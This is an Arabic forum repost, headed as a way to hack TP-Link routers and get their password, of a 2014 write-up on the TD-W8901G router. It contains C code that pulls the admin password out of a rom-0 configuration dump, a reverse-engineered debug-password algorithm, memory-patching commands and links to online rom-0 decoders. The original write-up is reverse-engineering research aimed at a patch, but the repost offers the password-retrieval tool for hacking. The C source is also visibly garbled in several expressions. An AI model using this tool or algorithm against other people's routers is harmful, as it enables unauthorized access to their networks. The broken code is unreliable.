اختراق روتر التب لنك حصريا معرفة الباسوورد2015

[size=54]Hacking and patching TP-LINK TD-W8901G router[/size]

[size=34]by piotrbania.com  / twitter: @PiotrBania / 31.01.2014[/size]

/**

zynos rom-0 config password retriever
http://piotrbania.com


Sample LZS unpacker for rom-0 files (those files are used to
store your valuable information by the router). This proggy
only focuses on retrieving the password from the rom-0 file.


heavily based on:
- http://git.kopf-tisch.de/?p=zyxel-revert;a=summary
- https://github.com/OmerMor/SciStudio/tree/master/scistudio

**/



#include
#include
#include



typedef unsigned short U16;
typedef unsigned long U32;
typedef unsigned char UCHAR;

typedef struct _lzs_struct
{
UCHAR *Src;
UCHAR *Dest;
UCHAR *DestNew;
U32 SrcPos;
} lzs_s;


#ifdef _MSC_VER
#pragma pack(push, 1)
typedef struct romfile_struct {
U16 version;
U16 size;
U16 offset;
char name[14];
} rom_s;
#pragma pack(pop)
#endif

#ifdef __GNUC__
typedef struct __attribute__((packed)) romfile_struct {
U16 version;
U16 size;
U16 offset;
char name[14];
} rom_s;

#define __FUNCTION__ __func__
#define _snprintf snprintf
#endif



U16 htons(U16 x)
{
UCHAR *s = (UCHAR*)&x;
return (U16)(s[0] << 8 | s[1]);
}

U32 GetBits(lzs_s *Lzs, int NumOfBits)
{
U32 Out = 0;
int BytePos, BitPos;

if(NumOfBits > 0)
{
BytePos = Lzs->SrcPos / 8;
BitPos = Lzs->SrcPos % 8;

Out = (Lzs->Src[BytePos] << 16) | (Lzs->Src[BytePos + 1] << | Lzs->Src[BytePos + 2];
Out = (Out >> (24 - NumOfBits - BitPos)) & ((1L << NumOfBits) - 1);
Lzs->SrcPos += NumOfBits;
}

return Out;
}

int GetLen(lzs_s *Lzs)
{

int Bits;
int Length=2;

do
{
Bits = GetBits(Lzs, 2);
Length += Bits;
}
while((Bits == 3) && (Length < );

if (Length ==
{
do
{
Bits = GetBits(Lzs, 4);
Length += Bits;
}
while(Bits == 15);
}

return Length;
}


int LzsUnpack(lzs_s *Lzs)
{
int Tag, Offset, Len;
UCHAR *d, *Dict;

d = Lzs->Dest;

// unpacking loop
while (1)
{

Tag = GetBits(Lzs, 1);

if (Tag == 0)
{
// uncompressed byte
*d++ = (UCHAR)GetBits(Lzs, ;
continue;
}


Tag = GetBits(Lzs, 1);
Offset = GetBits(Lzs, (Tag == 1) ? 7:11);

if ((Tag == 1) && (Offset == 0))
{
// end of stream?
printf("End of stream\r\n");
break;
}


Dict = &d[-Offset];

if (Dict < Lzs->Dest)
{
printf("%s: underflow error, offset=0x%08x tag=0x%08x\r\n",
__FUNCTION__,
Offset,
Tag);
break;
}


Len = GetLen(Lzs);
while (Len--)
*d++ = *Dict++;
}

Lzs->DestNew = d;
return 0;
}

int LzsUnpackFile(char *FileName)
{
int i;
FILE *SrcFile, *DestFile;
UCHAR *Src, *Dest, *Base, *d, *s;
long FileSize;

lzs_s Lzs;
rom_s Roms;

char DestFilePath[256];

memset(&Lzs, 0, sizeof(lzs_s));


SrcFile = fopen(FileName, "rb");
if (!SrcFile)
{
printf("%s: unable to open file \"%s\"\r\n", __FUNCTION__, FileName);
return -1;
}


fseek(SrcFile, 0, SEEK_END);
FileSize = ftell(SrcFile);
fseek(SrcFile, 0, SEEK_SET);


// warning: this can overflow
#define DEST_SIZE FileSize*50
Src = (UCHAR*)malloc(FileSize);
Dest = (UCHAR*)malloc(DEST_SIZE);

if (!Src || !Dest)
{
printf("%s: unable to allocate memory, FileSize = 0x%08x\r\n", __FUNCTION__, FileSize);
fclose(SrcFile);
return -1;
}

d = Dest;
s = Src;

memset(Dest, 0, DEST_SIZE);
fread(Src, 1, FileSize, SrcFile);
fclose(SrcFile);



#define BASE_OFFSET 0x2000
#define PASS_OFFSET 0x14

i = 0;
Base = s + BASE_OFFSET;


while (1)
{

memcpy(&Roms, Base, sizeof(rom_s));
Roms.size = htons(Roms.size);
Roms.offset = htons(Roms.offset);

if ((Base > (Src + FileSize)) || (Roms.name[0] == 0))
{
printf("End of file reached.\r\n");
break;
}

printf("[%02d] rom_header block offset=0x%08x size=0x%08x name=%s \r\n",
i++,
Roms.offset,
Roms.size,
Roms.name);


if (strcmp((char*)&Roms.name, "autoexec.net") == 0)
{
Lzs.Dest = d;
Lzs.Src = s + BASE_OFFSET + Roms.offset + 0xC + 4;
Lzs.SrcPos = 0;
LzsUnpack(&Lzs);

printf("Your password is: %s\r\n", (Lzs.Dest + PASS_OFFSET));
}
else
{
printf("Not the one we wanted, skipping.\r\n");
}

Base += sizeof(rom_s);
}


_snprintf(DestFilePath, sizeof(DestFilePath) - 1, "%s.dat", FileName);

DestFile = fopen(DestFilePath, "wb");
if (DestFile)
{
fwrite(Dest, ((UCHAR*)Lzs.DestNew - (UCHAR*)Dest), 1, DestFile);
fclose(DestFile);

printf("Dumped %d bytes to \"%s\"\r\n", ((UCHAR*)Lzs.DestNew - (UCHAR*)Dest), DestFilePath);
}
else
{
printf("%s: error unable to dump unpacked data to \"%s\"!\r\n", __FUNCTION__, DestFilePath);
}

free(Dest);
free(Src);
return 0;
}



int main(int argc, char *argv[])
{

printf("--------------------------------------------\r\n");
printf(" zynos rom-0 config password retriever\r\n");
printf(" http://piotrbania.com - @piotrbania \r\n");
printf("--------------------------------------------\r\n\r\n");


if (argc < 2)
{
printf("Usage: rom0decoder \r\n");
return -1;
}

printf("Trying to retrieve password from \"%s\"\r\n", argv[1]);
LzsUnpackFile(argv[1]);

printf("All done!\r\n");

return 0;
}



[size=30]Serial connection[/size]

Most of the routers (or embedded devices in general) have some sort of communication port designed to aid the manufactures with testing and debugging of the target device. This communication port is usually SERIAL (UART/RS232) or JTAG (EJTAG). In my case I was unable to find the JTAG (EJTAG) port but I have found the serial port instead (presented on images below). 




First of all this is some ugly ass soldering work (yes I did that). Ok now getting back to my initial point I have used PL2303 RS232<>USB converter to connect the serial port to the usb port of my computer. Putty is pretty decent for handling normal serial communication so I have used it as my default client (configuration: 115200/8/1/N). I was expecting to see some output in my putty but unfortunately I got nothing. So after some digging around and harassing few friends (ohayo!) I have found out that my voltage levels on RX and TX pins were too low (should be 3.3V). So after some further digging and looking on schematics of this board it became obvious that two resistors are missing (see image above). So I took a piece of wire and I have connected the empty pins together (in two places obviously). So now the voltage levels were correct and I was able to see the output in my terminal. 

This is what I have received: 

[list=linenums]
[*]Bootbase Version: VTC1.15 | 2007/11/12 17:18:52
[*]RAM: Size = 8192 Kbytes
[*]DRAM POST: Testing: 8192K
[*]OK
[*]FLASH: AMD 16M *1
 
[*]RAS Version: 1.0.2 Build 080522 Rel.37708
[*]System ID: *2.11.36.0(RE9.C29)3.10.2.60| 2008/04/24
 
[*]Press any key to enter debug mode within 3 seconds.
[*].....................................
[*]Enter Debug Mode
[/list]

After some additional digging I have found that you can use 'ATHE' command to list all available commands (this is not really deeply documented anywhere):

[list=linenums]
[*]======= Debug Command Listing =======
[*]AT just answer OK
[*]ATHE print help
[*]ATBAx change baudrate. 1:38.4k, 2:19.2k, 3:9.6k 4:57.6k 5:115.2k
[*]ATENx,(y) set BootExtension Debug Flag (y=password)
[*]ATSE show the seed of password generator
[*]ATTI(h,m,s) change system time to hour:min:sec or show current time
[*]ATDA(y,m,d) change system date to year/month/day or show current date
[*]ATDS dump RAS stack
[*]ATDT dump Boot Module Common Area
[*]ATDUx,y dump memory contents from address x for length y
[*]ATRBx display the 8-bit value of address x
[*]ATRWx display the 16-bit value of address x
[*]ATRLx display the 32-bit value of address x
[*]ATGO(x) run program at addr x or boot router
[*]ATGR boot router
[*]ATGT run Hardware Test Program
[*]ATRTw,x,y(,z) RAM test level w, from address x to y (z iterations)
[*]ATSH dump manufacturer related data in ROM
[*]ATDOx,y download from address x for length y to PC via XMODEM
[*]ATTD download router configuration to PC via XMODEM
[*]ATUR upload router firmware to flash ROM
 
[*]< press any key to continue >
[*]ATLC upload router configuration file to flash ROM
[*]ATXSx xmodem select: x=0: CRC mode(default); x=1: checksum mode
[*]ATLD Upload Configuration File and Default ROM File to Flash
[*]ATCD Convert Running ROM File to Default ROM File into Flash
[/list]

So at this point we have a set of commands but still no way to debug this thing. We can't see the registers, we can't set breakpoints, we can't step on instructions so this a bit like walking in a fog. The good point is we can read and dump memory. So piece by piece using ATDO command I have dumped the memory from the device. Please note that this is a rather painful process because every attempt to read unavailable memory will end up with the device turning into zombie mode (no crash dump or even a guru meditation it just freezes). I have noticed that MINICOM is simply the best thing to dump the memory (I have tried using TeraTerm and HyperTerminal but they both were pretty unstable). 




But before we will go to the dump analysis itself there is one especially interesting command -ATEN (set BootExtension Debug Flag (y=password)). So as you can see we need the secret password to use it otherwise it will simply return ERROR. But when successfully used it will provide us some awesome hidden commands!

[size=30]ATEN Password Generator[/size]

So like always in those type of situations you start with googling it up. Somewhere in the google results I have found a website called "Running uCLinux on a ZyXEL router". You can find a ATEN password generation algorithm there but unfortunately it didn't work on my device. So we are back to square one and we need to do some disassembly together with static analysis. 

The first step in my approach was to locate the function responsible for handling the ATEN command. I have located this piece by searching for a dispatch-command table. Why I knew there will be one? I just assumed I would code it that way (there isn't any other option really except creating a giant if-elseif condition set). Here it is: 

[list=linenums]
[*]ROM:800158A0 CmdTable: .word unk_80015C20 # DATA XREF: sub_8000E3D8+4Co
[*]ROM:800158A0 # sub_8000E3D8+90o ...
[*]ROM:800158A4 .word sub_8000E6D0
[*]ROM:800158A8 .byte 0
[*]ROM:800158A9 .byte 0
[*]ROM:800158AA .byte 0
[*]ROM:800158AB .byte 0
[*]ROM:800158AC .word aJustAnswerOk # " just answer OK"
[*]ROM:800158B0 .word aAthe # "ATHE"
[*]ROM:800158B4 .word CMD_SHOW_HELP_ATHE
[*]ROM:800158B8 .byte 0
[*]ROM:800158B9 .byte 0
[*]ROM:800158BA .byte 0
[*]ROM:800158BB .byte 0
[*]ROM:800158BC .word aPrintHelp # " print help"
[*]ROM:800158C0 .word aAtba # "ATBA"
[*]ROM:800158C4 .word CMD_ATBA
[*]...
[*]ROM:800158D0 .word aAten # "ATEN"
[*]ROM:800158D4 .word CMD_ATEN
[*]...
[/list]

The table itselft is pretty straight forward (remember on MIPS word is 4 bytes). So let's now see the CMD_ATEN function (the most important part):

[list=linenums]
[*]ROM:8000FF84 lw $a0, 8($s0)
[*]ROM:8000FF88 jal sub_80013654
[*]ROM:8000FF8C li $a1, 0
[*]ROM:8000FF90 jal generate_passwd
[/list]

And now generate_passwd function:

[list=linenums]
[*]ROM:80010A2C generate_passwd: # CODE XREF: CMD_ATEN+50p
[*]ROM:80010A2C lui $t9, 0xA11F
[*]ROM:80010A30 lw $v1, ptrDO_GTABLE
[*]ROM:80010A34 lw $t8, dword_80017050
[*]ROM:80010A38 lw $v1, 0x18($v1) # take the seed part, generated by the ATSE command
[*]ROM:80010A3C lbu $t8, 0x6D($t8) # take the last byte of the MAC Address
[*]ROM:80010A40 sll $v1, 8 # $v1 = v1 << 8
[*]ROM:80010A44 andi $t7, $t8, 7 # $t7 = t8 & 0x7
[*]ROM:80010A48 li $t8, 0 # $t8 = 0
[*]ROM:80010A4C srl $v1, 8 # $v1 = v1 >> 8
[*]ROM:80010A50 li $t9, 0xA11F5AC6 # $t9 = MAGIC
[*]ROM:80010A54 j loc_80010A68
[*]ROM:80010A58 addu $t9, $v1, $t9 # $t9 = $v1 + $t9
[*]ROM:80010A5C # ---------------------------------------------------------------------------
[*]ROM:80010A5C
[*]ROM:80010A5C loc_80010A5C: # CODE XREF: generate_passwd+40j
[*]ROM:80010A5C sll $t9, 31 # $t9 = $t9 << 31
[*]ROM:80010A60 or $t9, $t6, $t9 # $t9 = $t6 | $t9
[*]ROM:80010A64 addiu $t8, 1 # $t8 = $t8 + 1
[*]ROM:80010A68
[*]ROM:80010A68 loc_80010A68: # CODE XREF: generate_passwd+28j
[*]ROM:80010A68 sltu $t6, $t8, $t7 # $t6 = (t8 < t7? 1:0)
[*]ROM:80010A6C bnez $t6, loc_80010A5C # take jump if $t6 != 0
[*]ROM:80010A70 srl $t6, $t9, 1 # $t6 = $t9 >> 1
[*]ROM:80010A74 jr $ra # all done, exit
[*]ROM:80010A78 xor $v0, $t9, $v1 # $v0 = $t9 ^ $v1
[/list]

Some notes from the code:

• $v1 is the seed value (generated by the ATSE command, zero if ATSE is not used)
  
• $t8 initially contains the last byte of MAC Address (last octet)
  
• 0xA11F5AC6 is a magic value we were looking for!
  
• Those two instructions: "$v1 = v1 << 8" and "$v1 = v1 >> 8" are equal to "seed = seed & 0x00FFFFFF"
  
• The loop with (sll-or-srl) is nothing more than a ROR instruction (ROR instruction on MIPS is a pseudoinstruction meaning it is typically emulated by using sll-or-srl sequence)
  
• $v0 is the result
  

So this is how it would look in C:

[list=linenums]
[*]U32 generate_passwd(U32 seed, U8 last_mac_octet)
[*]{
[*]U32 b = seed & 0x00FFFFFF;
[*]U32 r = ROR(b + 0xA11F5AC6, last_mac_octet & 7);
[*]return r^b;
[*]}
[/list]

And as you can see this is pretty much the algorithm used by ZyXEL the only difference is the MAGIC VALUE (0xA11F5AC6). You can use the script below to generate your own password for ATEN (remember if you will not use the ATSE command your seed will be zero). 

ATEN Password Generation Script:

[b][b][b][b]Field[/b][/b][/b][/b]	[b][b][b][b]Value[/b][/b][/b][/b]
[size=10][b][size=10][b][size=10][b][size=10][b]Seed:[/b][/size][/b][/size][/b][/size][/b][/size]
[size=10][b][size=10][b][size=10][b][size=10][b]Last MAC Octet:[/b][/size][/b][/size][/b][/size][/b][/size]

In my case the magic command was "ATEN1,508fad63" and this is what "ATHE" produced afterwards:

[list=linenums]
[*]======= Debug Command Listing =======
[*]AT just answer OK
[*]ATHE print help
[*]ATBAx change baudrate. 1:38.4k, 2:19.2k, 3:9.6k 4:57.6k 5:115.2k
[*]ATENx,(y) set BootExtension Debug Flag (y=password)
[*]ATSE show the seed of password generator
[*]ATTI(h,m,s) change system time to hour:min:sec or show current time
[*]ATDA(y,m,d) change system date to year/month/day or show current date
[*]ATDS dump RAS stack
[*]ATDT dump Boot Module Common Area
[*]ATDUx,y dump memory contents from address x for length y
[*]ATWBx,y write address x with 8-bit value y
[*]ATWWx,y write address x with 16-bit value y
[*]ATWLx,y write address x with 32-bit value y
[*]ATRBx display the 8-bit value of address x
[*]ATRWx display the 16-bit value of address x
[*]ATRLx display the 32-bit value of address x
[*]ATGO(x) run program at addr x or boot router
[*]ATGR boot router
[*]ATGT run Hardware Test Program
[*]AT%Tx Enable Hardware Test Program at boot up
[*]ATBTx block0 write enable (1=enable, other=disable)

 
[*]ATRTw,x,y(,z) RAM test level w, from address x to y (z iterations)
[*]ATWEa(,b,c,d) write MAC addr, Country code, EngDbgFlag, FeatureBit to flash ROM
[*]ATCUx write Country code to flash ROM
[*]ATCB copy from FLASH ROM to working buffer
[*]ATCL clear working buffer
[*]ATSB save working buffer to FLASH ROM
[*]ATBU dump manufacturer related data in working buffer
[*]ATSH dump manufacturer related data in ROM
[*]ATWMx set low 6 digits MAC address in working buffer
[*]ATMHx set hight 6 digits MAC address in working buffer
[*]ATBS show the bootbase seed of password generator
[*]ATLBx xmodem upload bootbase,x is password
[*]ATSMx set 6 digits MAC address in working buffer
[*]ATCOx set country code in working buffer
[*]ATFLx set EngDebugFlag in working buffer
[*]ATSTx set ROMRAS address in working buffer
[*]ATSYx set system type in working buffer
[*]ATVDx set vendor name in working buffer
[*]ATPNx set product name in working buffer
[*]ATFEx,y,... set feature bits in working buffer
[*]ATMP check & dump memMapTab
[*]ATDOx,y download from address x for length y to PC via XMODEM

[*]ATTD download router configuration to PC via XMODEM
[*]ATUPx,y upload to RAM address x for length y from PC via XMODEM
[*]ATUR upload router firmware to flash ROM
[*]ATDC hardware version check disable during uploading firmware
[*]ATLC upload router configuration file to flash ROM
[*]ATUXx(,y) xmodem upload from flash block x to y
[*]ATERx,y erase flash rom from block x to y
[*]ATWFx,y,z copy data from addr x to flash addr y, length z
[*]ATXSx xmodem select: x=0: CRC mode(default); x=1: checksum mode
[*]ATLD Upload Configuration File and Default ROM File to Flash
[*]ATBR Reset to default Romfile
[*]ATCD Convert Running ROM File to Default ROM File into Flash
[/list]

Now we have access to few other interesting commands. Remember the objective is to patch the ROM-0 download vulnerability.

[size=30]Patching the vulnerability (virtually)[/size]

In order to patch the vulnerability we need to patch the stage2 firmware (we are still on the stage1 level - minimal boot firmware). You can go to the stage2 firmware by typing ATGR (boot router) command. The bad thing about that is after this step we will have no access to stage 1 commands. So we can't really patch

[list=linenums]
[*](Compressed)
[*]Version: ADSL ATU-R, start: bfc5d430
[*]Length: 390890, Checksum: 08F1
[*]Compressed Length: D7150, Checksum: DBE7
 
[*]Copyright (c) 2001 - 2006 TP-LINK TECHNOLOGIES CO., LTD
[*]initialize ch = 0, IP175C, ethernet address: 00:XX:XX:XX:XX:41
[*]initialize ch = 1, ethernet address: 00:XX:XX:XX:XX:41
[*]Wan Channel init ........ done
[*]Initializing ADSL F/W ........ done
[*]ANNEXAL
[*]set try multimode number to 3 (dropmode try num 3)
[*]Syncookie switch On!
[*]Press ENTER to continue...
 
[*]Valid commands are:
[*]sys exit ether wan
[*]ip bridge dot1q pktqos
[*]show set lan
[*]tc>
[/list]

So what happened? The compressed stage 2 firmware got decompressed and executed. Knowing the ATGR command boots up the router let's find the instruction that passes the execution to the stage 2 firmware. This seems to be the best option because the firmware at that point is already unpacked.

[list=linenums]
[*]ROM:80011E8C loc_80011E8C: # CODE XREF: LoadAndRunImage+D8j
[*]ROM:80011E8C jal sub_80009B24
[*]ROM:80011E90 li $a0, 0x1F4
[*]ROM:80011E94
[*]ROM:80011E94 execute_image: # execute image
[*]ROM:80011E94 jalr $s0 # jump and link to address in $s0
[*]ROM:80011E98 nop
[/list]

Now the question is what is the address stored in $s0? Obviously we still can't set a breakpoint, we can't view the registers so we need to leak it using some trick. But wait we can read and write memory so take a look on the following command:

[list=linenums]
[*]ATWL 80011E94, ae30001c
[*]ATGR
[/list]

This command patches the instruction at 0x80011E94 with ae30001c (the byte representation of MIPS "sw $s0, 0x1C($s1)" instruction). By overwriting the original jalr $s0 with sw $s0, 0x1C($s1) we have forced the program to store the contents of $s0 register to 0x8001FF1Cmemory address. So now stage 2 firmware will not be executed instead the "ERROR" message will be presented and we will still have the access to the stage1 console! So let's take a look what was stored at 0x8001FF1C.

[list=linenums]
[*]ATRL 8001FF1C
[*]8001FF1C: 80020000
[/list]

So now when we have leaked stage 2 address (0x80020000) we can dump it and analyse it properly). 

So keeping in mind that we want to block ROM-0 from being downloadable I have found (using trail and error and xrefs) following code fragment that was a great candidate for patching:

[list=linenums]
[*]ROM:80248C98 la $a1, aRom0_8 # "/rom-0"
[*]ROM:80248CA0 jal sub_802D0F2C
[*]ROM:80248CA4 move $a0, $s2
[*]ROM:80248CA8 beqz $v0, loc_80248CB8 # NOP THIS SIR
[*]ROM:80248CAC li $v1, 0xE
[*]ROM:80248CB0 j loc_exit
[*]ROM:80248CB4 sw $v1, 0x64($s3)
 
 
[*]ROM:80248DEC loc_exit: # CODE XREF: sub_80248AA8+208j
[*]ROM:80248DEC # sub_80248AA8+21Cj ...
[*]ROM:80248DEC lw $ra, 0x28+var_4($sp)
[*]ROM:80248DF0 lw $s0, 0x28+var_28($sp)
[*]ROM:80248DF4 lw $s1, 0x28+var_24($sp)
[*]ROM:80248DF8 lw $s2, 0x28+var_20($sp)
[*]ROM:80248DFC lw $s3, 0x28+var_1C($sp)
[*]ROM:80248E00 lw $s4, 0x28+var_18($sp)
[*]ROM:80248E04 lw $s5, 0x28+var_14($sp)
[*]ROM:80248E08 lw $s6, 0x28+var_10($sp)
[*]ROM:80248E0C lw $fp, 0x28+var_8($sp)
[*]ROM:80248E10 nop
[*]ROM:80248E14 jr $ra
[*]ROM:80248E18 addiu $sp, 0x28
[/list]

So the beqz $v0, loc_80248CB8 instruction jumps to loc_80248CB8 and we simply don't want that. So instead when the condition is not met this procedure jumps to loc_exit which is basically saying "goodbye". So let's patch the beqz with NOP:

[list=linenums]
[*]ATEN 1,508fad63
[*]ATWL 80011E94, 00000000
[*]ATGR
[*]ATWL 80248CA8, 00000000
[*]ATGO 80020000
[/list]

So now when the stage 2 firmware is patched in memory and booted it is time to test it (for the record: 192.168.2.1 - is my router addr)! 




SUCCESS!

[size=30]Conclusion[/size]

This simple patch was done in virtual memory only meaning everything will come back to the state it was before applying it after your router reboots. This is convenient from one side and inconvenient from the other. It is certainly possible to flash the device with modified firmware but I will not provide such methods here. One way or another I hope you have enjoyed the journey as I did. There are probably a plenty more vulnerabilities like this one somewhere inside every router so sometimes such ghetto hacks may become necessary :-) (let's hope not!). Obviously this was just one simply patch and it wasn't heavily tested in action. Please use this method as a way of learning something NOT as an actual remedy (probably there are plenty of other bugs that need to be patched as well). - PIOTR 31.01.2014 / EOF. 

[size=30]Bonus Binwalk[/size]

Some additional material from binwalk: 

[list=linenums]
[*]root@ubuntu:/home/die/binwalk/firmware# binwalk firmware.bin
[*]DECIMAL HEX DESCRIPTION
[*]-------------------------------------------------------------------------------------------------------------------
[*]84992 0x14C00 ZynOS header, header size: 48 bytes, rom image type: ROMBIN, uncompressed size: 66696,
[*]compressed size: 16845, uncompressed checksum:
 
[*]0xC92E, compressed checksum: 0xC9CE, flags: 0xE0, uncompressed checksum is valid, the binary is compressed, compressed
[*]checksum is valid, memory map table address: 0x0
[*]85043 0x14C33 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes,
[*]uncompressed size: 66696 bytes
[*]128002 0x1F402 GIF image data, version "89a", 200 x 50
[*]136194 0x21402 GIF image data, version "89a", 560 x 50
[*]349184 0x55400 ZynOS header, header size: 48 bytes, rom image type: ROMBIN, uncompressed size: 3737744,
[*]compressed size: 880976, uncompressed checksum:
 
[*]0x8F1, compressed checksum: 0xDBE7, flags: 0xE0, uncompressed checksum is valid, the binary is compressed, compressed
[*]checksum is valid, memory map table address: 0x0
[*]349235 0x55433 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes,
[*]uncompressed size: 3737744 bytes
 
 
 
[*]dd if=firmware.bin bs=1 skip=85043 of=image1.lzma
[*]dd if=firmware.bin bs=1 skip=349235 of=image2.lzma
 
[*]root@ubuntu:/home/die/binwalk/firmware# lzma -d image1.lzma
[*]root@ubuntu:/home/die/binwalk/firmware# lzma -d image2.lzma
 
 
[*]die@ubuntu:~/binwalk/firmware$ binwalk image2
 
[*]DECIMAL HEX DESCRIPTION
[*]-------------------------------------------------------------------------------------------------------------------
[*]2840932 0x2B5964 Copyright string: " (c) 1994 - 2004 ZyXEL Communications Corp."
[*]2840988 0x2B599C Copyright string: " (c) 2001 - 2006 TrendChip Technologies Corp."
[*]2841044 0x2B59D4 Copyright string: " (c) 2001 - 2006 "
[*]2865263 0x2BB86F LZMA compressed data, properties: 0x48, dictionary size: 33554432 bytes,
[*]uncompressed size: 16777216 bytes
[*]3037283 0x2E5863 LZMA compressed data, properties: 0x5C, dictionary size: 33554432 bytes,
[*]uncompressed size: 16777216 bytes
[*]3037543 0x2E5967 LZMA compressed data, properties: 0xB4, dictionary size: 33554432 bytes,
[*]uncompressed size: 16777216 bytes
[*]3209377 0x30F8A1 LZMA compressed data, properties: 0x40, dictionary size: 2097152 bytes,
[*]uncompressed size: 2097216 bytes
[*]3350495 0x331FDF LZMA compressed data, properties: 0xB8, dictionary size: 16777216 bytes,
[*]uncompressed size: 538981760 bytes
[*]3445523 0x349313 LZMA compressed data, properties: 0x40, dictionary size: 16777216 bytes,
[*]uncompressed size: 949368448 bytes
[*]3563851 0x36614B LZMA compressed data, properties: 0x90, dictionary size: 16777216 bytes,
[*]uncompressed size: 33554432 bytes
[*]3652626 0x37BC12 GIF image data, version "89a", 16 x 16
[*]3653238 0x37BE76 GIF image data, version "89a", 16 x 16
[*]3654302 0x37C29E GIF image data, version "89a", 16 x 16
[*]3655370 0x37C6CA GIF image data, version "89a", 16 x 16
[*]3734691 0x38FCA3 LZMA compressed data, properties: 0x88, dictionary size: 33554432 bytes,
[*]uncompressed size: 167772160 bytes
[*]3737404 0x39073C Copyright string: " (c) 1996-2000 Express Logic Inc. * ThreadX R3900/Green Hills "
[/list]

رابط موقع فك التشفير


http://50.57.229.26/zynos.php

llocatiion change

http://198.61.167.113/zynos/